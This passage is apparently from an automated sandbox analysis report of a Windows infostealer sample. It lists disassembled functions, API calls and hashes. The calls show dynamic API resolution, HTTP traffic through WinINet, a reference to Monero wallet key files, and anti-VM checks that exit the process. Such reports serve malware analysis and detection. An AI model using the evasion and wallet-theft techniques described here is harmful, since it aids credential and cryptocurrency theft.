                            • GetProcAddress.KERNEL32(6FCD0000,00D357D0), ref: 000EA502
                            • GetProcAddress.KERNEL32(6FCD0000,00D4D4B8), ref: 000EA51B
                            • GetProcAddress.KERNEL32(752C0000,00D357F0), ref: 000EA53C
                            • GetProcAddress.KERNEL32(752C0000,00D35990), ref: 000EA554
                            • GetProcAddress.KERNEL32(752C0000,00D4D590), ref: 000EA56D
                            • GetProcAddress.KERNEL32(752C0000,00D4D410), ref: 000EA585
                            • GetProcAddress.KERNEL32(752C0000,00D35870), ref: 000EA59D
                            • GetProcAddress.KERNEL32(74EC0000,00D3B9C8), ref: 000EA5C3
                            • GetProcAddress.KERNEL32(74EC0000,00D3B8B0), ref: 000EA5DB
                            • GetProcAddress.KERNEL32(74EC0000,00D4D4D0), ref: 000EA5F3
                            • GetProcAddress.KERNEL32(74EC0000,00D359F0), ref: 000EA60C
                            • GetProcAddress.KERNEL32(74EC0000,00D356F0), ref: 000EA624
                            • GetProcAddress.KERNEL32(74EC0000,00D3B9A0), ref: 000EA63C
                            • GetProcAddress.KERNEL32(75BD0000,00D4D440), ref: 000EA662
                            • GetProcAddress.KERNEL32(75BD0000,00D35950), ref: 000EA67A
                            • GetProcAddress.KERNEL32(75BD0000,00D48F38), ref: 000EA692
                            • GetProcAddress.KERNEL32(75BD0000,00D4D4E8), ref: 000EA6AB
                            • GetProcAddress.KERNEL32(75BD0000,00D4D530), ref: 000EA6C3
                            • GetProcAddress.KERNEL32(75BD0000,00D359D0), ref: 000EA6DB
                            • GetProcAddress.KERNEL32(75BD0000,00D35890), ref: 000EA6F4
                            • GetProcAddress.KERNEL32(75BD0000,00D4D470), ref: 000EA70C
                            • GetProcAddress.KERNEL32(75BD0000,00D4D458), ref: 000EA724
                            • GetProcAddress.KERNEL32(75A70000,00D356B0), ref: 000EA746
                            • GetProcAddress.KERNEL32(75A70000,00D4D488), ref: 000EA75E
                            • GetProcAddress.KERNEL32(75A70000,00D4D4A0), ref: 000EA776
                            • GetProcAddress.KERNEL32(75A70000,00D4D548), ref: 000EA78F
                            • GetProcAddress.KERNEL32(75A70000,00D4D500), ref: 000EA7A7
                            • GetProcAddress.KERNEL32(75450000,00D35710), ref: 000EA7C8
                            • GetProcAddress.KERNEL32(75450000,00D35730), ref: 000EA7E1
                            • GetProcAddress.KERNEL32(75DA0000,00D35910), ref: 000EA802
                            • GetProcAddress.KERNEL32(75DA0000,00D4D518), ref: 000EA81A
                            • GetProcAddress.KERNEL32(6F070000,00D357B0), ref: 000EA840
                            • GetProcAddress.KERNEL32(6F070000,00D35930), ref: 000EA858
                            • GetProcAddress.KERNEL32(6F070000,00D35A10), ref: 000EA870
                            • GetProcAddress.KERNEL32(6F070000,00D4D560), ref: 000EA889
                            • GetProcAddress.KERNEL32(6F070000,00D35750), ref: 000EA8A1
                            • GetProcAddress.KERNEL32(6F070000,00D35A30), ref: 000EA8B9
                            • GetProcAddress.KERNEL32(6F070000,00D35810), ref: 000EA8D2
                            • GetProcAddress.KERNEL32(6F070000,00D35790), ref: 000EA8EA
                            • GetProcAddress.KERNEL32(6F070000,InternetSetOptionA), ref: 000EA901
                            • GetProcAddress.KERNEL32(6F070000,HttpQueryInfoA), ref: 000EA917
                            • GetProcAddress.KERNEL32(75AF0000,00D4CDF8), ref: 000EA939
                            • GetProcAddress.KERNEL32(75AF0000,00D49058), ref: 000EA951
                            • GetProcAddress.KERNEL32(75AF0000,00D4CF30), ref: 000EA969
                            • GetProcAddress.KERNEL32(75AF0000,00D4CE28), ref: 000EA982
                            • GetProcAddress.KERNEL32(75D90000,00D35A50), ref: 000EA9A3
                            • GetProcAddress.KERNEL32(6F9B0000,00D4D008), ref: 000EA9C4
                            • GetProcAddress.KERNEL32(6F9B0000,00D35770), ref: 000EA9DD
                            • GetProcAddress.KERNEL32(6F9B0000,00D4D098), ref: 000EA9F5
                            • GetProcAddress.KERNEL32(6F9B0000,00D4D020), ref: 000EAA0D
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$LibraryLoad
                            • String ID: HttpQueryInfoA$InternetSetOptionA
                            • API String ID: 2238633743-1775429166
                            • Opcode ID: 23ae403653e41177d95041240447ee309da6c4ca0cbcf4e4093b3f2bb7716af7
                            • Instruction ID: 30c03427a09459f6335758de2866a6ec4b5f4ab9d52ae4ad644d8efc7f851de3
                            • Opcode Fuzzy Hash: 23ae403653e41177d95041240447ee309da6c4ca0cbcf4e4093b3f2bb7716af7
                            • Instruction Fuzzy Hash: 886200B66182009FC346DFA9EDC9A667BFDB78F701F148A1AB909C3270D7359941CB60
                            Function 000D48D0 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479networkstringfileCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 801 d48d0-d4992 call eaab0 call d4800 call eaa50 * 5 InternetOpenA StrCmpCA 816 d499b-d499f 801->816 817 d4994 801->817 818 d4f1b-d4f43 InternetCloseHandle call eade0 call da210 816->818 819 d49a5-d4b1d call e8cf0 call eac30 call eabb0 call eab10 * 2 call eacc0 call eabb0 call eab10 call eacc0 call eabb0 call eab10 call eac30 call eabb0 call eab10 call eacc0 call eabb0 call eab10 call eacc0 call eabb0 call eab10 call eacc0 call eac30 call eabb0 call eab10 * 2 InternetConnectA 816->819 817->816 829 d4f45-d4f7d call eab30 call eacc0 call eabb0 call eab10 818->829 830 d4f82-d4ff2 call e8b20 * 2 call eaab0 call eab10 * 8 818->830 819->818 905 d4b23-d4b27 819->905 829->830 906 d4b29-d4b33 905->906 907 d4b35 905->907 908 d4b3f-d4b72 HttpOpenRequestA 906->908 907->908 909 d4f0e-d4f15 InternetCloseHandle 908->909 910 d4b78-d4e78 call eacc0 call eabb0 call eab10 call eac30 call eabb0 call eab10 call eacc0 call eabb0 call eab10 call eacc0 call eabb0 call eab10 call eacc0 call eabb0 call eab10 call eacc0 call eabb0 call eab10 call eac30 call eabb0 call eab10 call eacc0 call eabb0 call eab10 call eacc0 call eabb0 call eab10 call eac30 call eabb0 call eab10 call eacc0 call eabb0 call eab10 call eacc0 call eabb0 call eab10 call eacc0 call eabb0 call eab10 call eacc0 call eabb0 call eab10 call eac30 call eabb0 call eab10 call eaa50 call eac30 * 2 call eabb0 call eab10 * 2 call eade0 lstrlen call eade0 * 2 lstrlen call eade0 HttpSendRequestA 908->910 909->818 1021 d4e82-d4eac InternetReadFile 910->1021 1022 d4eae-d4eb5 1021->1022 1023 d4eb7-d4f09 InternetCloseHandle call eab10 1021->1023 1022->1023 1024 d4eb9-d4ef7 call eacc0 call eabb0 call eab10 1022->1024 1023->909 1024->1021
                            APIs
                              • Part of subcall function 000EAAB0: lstrcpy.KERNEL32(?,00000000), ref: 000EAAF6
                              • Part of subcall function 000D4800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 000D4889
                              • Part of subcall function 000D4800: InternetCrackUrlA.WININET(00000000,00000000), ref: 000D4899
                              • Part of subcall function 000EAA50: lstrcpy.KERNEL32(000F0E1A,00000000), ref: 000EAA98
                            • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 000D4965
                            • StrCmpCA.SHLWAPI(?,00D4E898), ref: 000D498A
                            • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 000D4B0A
                            • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,000F0DDE,00000000,?,?,00000000,?,",00000000,?,00D4E778), ref: 000D4E38
                            • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 000D4E54
                            • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 000D4E68
                            • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 000D4E99
                            • InternetCloseHandle.WININET(00000000), ref: 000D4EFD
                            • InternetCloseHandle.WININET(00000000), ref: 000D4F15
                            • HttpOpenRequestA.WININET(00000000,00D4E7B8,?,00D4DE70,00000000,00000000,00400100,00000000), ref: 000D4B65
                              • Part of subcall function 000EACC0: lstrlen.KERNEL32(?,00D49238,?,\Monero\wallet.keys,000F0E1A), ref: 000EACD5
                              • Part of subcall function 000EACC0: lstrcpy.KERNEL32(00000000), ref: 000EAD14
                              • Part of subcall function 000EACC0: lstrcat.KERNEL32(00000000,00000000), ref: 000EAD22
                              • Part of subcall function 000EABB0: lstrcpy.KERNEL32(?,000F0E1A), ref: 000EAC15
                              • Part of subcall function 000EAC30: lstrcpy.KERNEL32(00000000,?), ref: 000EAC82
                              • Part of subcall function 000EAC30: lstrcat.KERNEL32(00000000), ref: 000EAC92
                            • InternetCloseHandle.WININET(00000000), ref: 000D4F1F
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                            • String ID: "$"$------$------$------
                            • API String ID: 460715078-2180234286
                            • Opcode ID: dd5056c609372bed0fdca71e834b8ae8aff0e97e16cf92934350e9f1e0eee551
                            • Instruction ID: 0b90431203e08dc6d40854d96b6edcc69edb6b2f4cd48c6201a91e4d453009e1
                            • Opcode Fuzzy Hash: dd5056c609372bed0fdca71e834b8ae8aff0e97e16cf92934350e9f1e0eee551
                            • Instruction Fuzzy Hash: 3812EC72A11158AFCB15EB91DDA2FEEB379AF1A300F114199B10676093DF707B48CB62
                            Function 000E5760 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383sleepCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1090 e5760-e57c7 call e5d20 call eab30 * 3 call eaa50 * 4 1106 e57cc-e57d3 1090->1106 1107 e5827-e589c call eaa50 * 2 call d1590 call e5510 call eabb0 call eab10 call eade0 StrCmpCA 1106->1107 1108 e57d5-e5806 call eab30 call eaab0 call d1590 call e5440 1106->1108 1134 e58e3-e58f9 call eade0 StrCmpCA 1107->1134 1138 e589e-e58de call eaab0 call d1590 call e5440 call eabb0 call eab10 1107->1138 1124 e580b-e5822 call eabb0 call eab10 1108->1124 1124->1134 1139 e58ff-e5906 1134->1139 1140 e5a2c-e5a94 call eabb0 call eab30 * 2 call d16b0 call eab10 * 4 call d1670 call d1550 1134->1140 1138->1134 1143 e590c-e5913 1139->1143 1144 e5a2a-e5aaf call eade0 StrCmpCA 1139->1144 1270 e5d13-e5d16 1140->1270 1147 e596e-e59e3 call eaa50 * 2 call d1590 call e5510 call eabb0 call eab10 call eade0 StrCmpCA 1143->1147 1148 e5915-e5969 call eab30 call eaab0 call d1590 call e5440 call eabb0 call eab10 1143->1148 1162 e5ab5-e5abc 1144->1162 1163 e5be1-e5c49 call eabb0 call eab30 * 2 call d16b0 call eab10 * 4 call d1670 call d1550 1144->1163 1147->1144 1249 e59e5-e5a25 call eaab0 call d1590 call e5440 call eabb0 call eab10 1147->1249 1148->1144 1170 e5bdf-e5c64 call eade0 StrCmpCA 1162->1170 1171 e5ac2-e5ac9 1162->1171 1163->1270 1199 e5c78-e5ce1 call eabb0 call eab30 * 2 call d16b0 call eab10 * 4 call d1670 call d1550 1170->1199 1200 e5c66-e5c71 Sleep 1170->1200 1178 e5acb-e5b1e call eab30 call eaab0 call d1590 call e5440 call eabb0 call eab10 1171->1178 1179 e5b23-e5b98 call eaa50 * 2 call d1590 call e5510 call eabb0 call eab10 call eade0 StrCmpCA 1171->1179 1178->1170 1179->1170 1275 e5b9a-e5bda call eaab0 call d1590 call e5440 call eabb0 call eab10 1179->1275 1199->1270 1200->1106 1249->1144 1275->1170
                            APIs
                              • Part of subcall function 000EAB30: lstrlen.KERNEL32(000D4F55,?,?,000D4F55,000F0DDF), ref: 000EAB3B
                              • Part of subcall function 000EAB30: lstrcpy.KERNEL32(000F0DDF,00000000), ref: 000EAB95
                              • Part of subcall function 000EAA50: lstrcpy.KERNEL32(000F0E1A,00000000), ref: 000EAA98
                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 000E5894
                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 000E58F1
                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 000E5AA7
                              • Part of subcall function 000EAAB0: lstrcpy.KERNEL32(?,00000000), ref: 000EAAF6
                              • Part of subcall function 000E5440: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 000E5478
                              • Part of subcall function 000EABB0: lstrcpy.KERNEL32(?,000F0E1A), ref: 000EAC15
                              • Part of subcall function 000E5510: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 000E5568
                              • Part of subcall function 000E5510: lstrlen.KERNEL32(00000000), ref: 000E557F
                              • Part of subcall function 000E5510: StrStrA.SHLWAPI(00000000,00000000), ref: 000E55B4
                              • Part of subcall function 000E5510: lstrlen.KERNEL32(00000000), ref: 000E55D3
                              • Part of subcall function 000E5510: lstrlen.KERNEL32(00000000), ref: 000E55FE
                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 000E59DB
                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 000E5B90
                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 000E5C5C
                            • Sleep.KERNEL32(0000EA60), ref: 000E5C6B
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpylstrlen$Sleep
                            • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                            • API String ID: 507064821-2791005934
                            • Opcode ID: 91bda2ef21a50cf5bdfe25d234b8d2fe32877924ac581729015b395df79706c7
                            • Instruction ID: d9dd9c064df2bf7285a9f18d81a7206f18d2c96c06d8fdec9b9905133cbcdbfb
                            • Opcode Fuzzy Hash: 91bda2ef21a50cf5bdfe25d234b8d2fe32877924ac581729015b395df79706c7
                            • Instruction Fuzzy Hash: 04E13071E106489ECB14FBA1EDA3EED737DAF59300F448568B50676193EF346A08CB62
                            Function 000E19F0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1301 e19f0-e1a1d call eade0 StrCmpCA 1304 e1a1f-e1a21 ExitProcess 1301->1304 1305 e1a27-e1a41 call eade0 1301->1305 1309 e1a44-e1a48 1305->1309 1310 e1a4e-e1a61 1309->1310 1311 e1c12-e1c1d call eab10 1309->1311 1313 e1bee-e1c0d 1310->1313 1314 e1a67-e1a6a 1310->1314 1313->1309 1316 e1acf-e1ae0 StrCmpCA 1314->1316 1317 e1aad-e1abe StrCmpCA 1314->1317 1318 e1a85-e1a94 call eab30 1314->1318 1319 e1b82-e1b93 StrCmpCA 1314->1319 1320 e1b63-e1b74 StrCmpCA 1314->1320 1321 e1bc0-e1bd1 StrCmpCA 1314->1321 1322 e1b41-e1b52 StrCmpCA 1314->1322 1323 e1ba1-e1bb2 StrCmpCA 1314->1323 1324 e1b1f-e1b30 StrCmpCA 1314->1324 1325 e1bdf-e1be9 call eab30 1314->1325 1326 e1afd-e1b0e StrCmpCA 1314->1326 1327 e1a99-e1aa8 call eab30 1314->1327 1328 e1a71-e1a80 call eab30 1314->1328 1334 e1aee-e1af1 1316->1334 1335 e1ae2-e1aec 1316->1335 1332 e1aca 1317->1332 1333 e1ac0-e1ac3 1317->1333 1318->1313 1344 e1b9f 1319->1344 1345 e1b95-e1b98 1319->1345 1342 e1b76-e1b79 1320->1342 1343 e1b80 1320->1343 1349 e1bdd 1321->1349 1350 e1bd3-e1bd6 1321->1350 1340 e1b5e 1322->1340 1341 e1b54-e1b57 1322->1341 1346 e1bbe 1323->1346 1347 e1bb4-e1bb7 1323->1347 1338 e1b3c 1324->1338 1339 e1b32-e1b35 1324->1339 1325->1313 1336 e1b1a 1326->1336 1337 e1b10-e1b13 1326->1337 1327->1313 1328->1313 1332->1313 1333->1332 1354 e1af8 1334->1354 1335->1354 1336->1313 1337->1336 1338->1313 1339->1338 1340->1313 1341->1340 1342->1343 1343->1313 1344->1313 1345->1344 1346->1313 1347->1346 1349->1313 1350->1349 1354->1313
                            APIs
                            • StrCmpCA.SHLWAPI(00000000,block), ref: 000E1A15
                            • ExitProcess.KERNEL32 ref: 000E1A21
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExitProcess
                            • String ID: block
                            • API String ID: 621844428-2199623458
                            • Opcode ID: 2d2214d6aba50bc85568e7c3c12641df3fedfccb37efdbd76a8e77a12d8aa21f
                            • Instruction ID: 6c98f7150f4e585494d295072fef19083ecf2268fc37c474be874af4f5022806
                            • Opcode Fuzzy Hash: 2d2214d6aba50bc85568e7c3c12641df3fedfccb37efdbd76a8e77a12d8aa21f
                            • Instruction Fuzzy Hash: 825157B4B0824AAFDB14DFA5D994BEE77B9EF44704F104448E502BB252E770E940DB62
                            Function 000E6C90 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                              • Part of subcall function 000E9BB0: GetProcAddress.KERNEL32(74DD0000,00D42470), ref: 000E9BF1
                              • Part of subcall function 000E9BB0: GetProcAddress.KERNEL32(74DD0000,00D42380), ref: 000E9C0A
                              • Part of subcall function 000E9BB0: GetProcAddress.KERNEL32(74DD0000,00D42500), ref: 000E9C22
                              • Part of subcall function 000E9BB0: GetProcAddress.KERNEL32(74DD0000,00D423B0), ref: 000E9C3A
                              • Part of subcall function 000E9BB0: GetProcAddress.KERNEL32(74DD0000,00D423E0), ref: 000E9C53
                              • Part of subcall function 000E9BB0: GetProcAddress.KERNEL32(74DD0000,00D48F68), ref: 000E9C6B
                              • Part of subcall function 000E9BB0: GetProcAddress.KERNEL32(74DD0000,00D35B10), ref: 000E9C83
                              • Part of subcall function 000E9BB0: GetProcAddress.KERNEL32(74DD0000,00D35D50), ref: 000E9C9C
                              • Part of subcall function 000E9BB0: GetProcAddress.KERNEL32(74DD0000,00D424E8), ref: 000E9CB4
                              • Part of subcall function 000E9BB0: GetProcAddress.KERNEL32(74DD0000,00D42218), ref: 000E9CCC
                              • Part of subcall function 000E9BB0: GetProcAddress.KERNEL32(74DD0000,00D424A0), ref: 000E9CE5
                              • Part of subcall function 000E9BB0: GetProcAddress.KERNEL32(74DD0000,00D42368), ref: 000E9CFD
                              • Part of subcall function 000E9BB0: GetProcAddress.KERNEL32(74DD0000,00D35E50), ref: 000E9D15
                              • Part of subcall function 000E9BB0: GetProcAddress.KERNEL32(74DD0000,00D42410), ref: 000E9D2E
                              • Part of subcall function 000EAA50: lstrcpy.KERNEL32(000F0E1A,00000000), ref: 000EAA98
                              • Part of subcall function 000D11D0: ExitProcess.KERNEL32 ref: 000D1211
                              • Part of subcall function 000D1160: GetSystemInfo.KERNEL32(?), ref: 000D116A
                              • Part of subcall function 000D1160: ExitProcess.KERNEL32 ref: 000D117E
                              • Part of subcall function 000D1110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 000D112B
                              • Part of subcall function 000D1110: VirtualAllocExNuma.KERNEL32(00000000), ref: 000D1132
                              • Part of subcall function 000D1110: ExitProcess.KERNEL32 ref: 000D1143
                              • Part of subcall function 000D1220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 000D123E
                              • Part of subcall function 000D1220: __aulldiv.LIBCMT ref: 000D1258
                              • Part of subcall function 000D1220: __aulldiv.LIBCMT ref: 000D1266
                              • Part of subcall function 000D1220: ExitProcess.KERNEL32 ref: 000D1294
                              • Part of subcall function 000E6A10: GetUserDefaultLangID.KERNEL32 ref: 000E6A14
                              • Part of subcall function 000D1190: ExitProcess.KERNEL32 ref: 000D11C6
                              • Part of subcall function 000E79E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,000D11B7), ref: 000E7A10
                              • Part of subcall function 000E79E0: RtlAllocateHeap.NTDLL(00000000), ref: 000E7A17
                              • Part of subcall function 000E79E0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 000E7A2F
                              • Part of subcall function 000E7A70: GetProcessHeap.KERNEL32(00000000,00000104), ref: 000E7AA0
                              • Part of subcall function 000E7A70: RtlAllocateHeap.NTDLL(00000000), ref: 000E7AA7
                              • Part of subcall function 000E7A70: GetComputerNameA.KERNEL32(?,00000104), ref: 000E7ABF
                              • Part of subcall function 000EACC0: lstrlen.KERNEL32(?,00D49238,?,\Monero\wallet.keys,000F0E1A), ref: 000EACD5
                              • Part of subcall function 000EACC0: lstrcpy.KERNEL32(00000000), ref: 000EAD14
                              • Part of subcall function 000EACC0: lstrcat.KERNEL32(00000000,00000000), ref: 000EAD22
                              • Part of subcall function 000EABB0: lstrcpy.KERNEL32(?,000F0E1A), ref: 000EAC15
                            • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00D48F78,?,000F10F4,?,00000000,?,000F10F8,?,00000000,000F0AF3), ref: 000E6D6A
                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 000E6D88
                            • CloseHandle.KERNEL32(00000000), ref: 000E6D99
                            • Sleep.KERNEL32(00001770), ref: 000E6DA4
                            • CloseHandle.KERNEL32(?,00000000,?,00D48F78,?,000F10F4,?,00000000,?,000F10F8,?,00000000,000F0AF3), ref: 000E6DBA
                            • ExitProcess.KERNEL32 ref: 000E6DC2
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
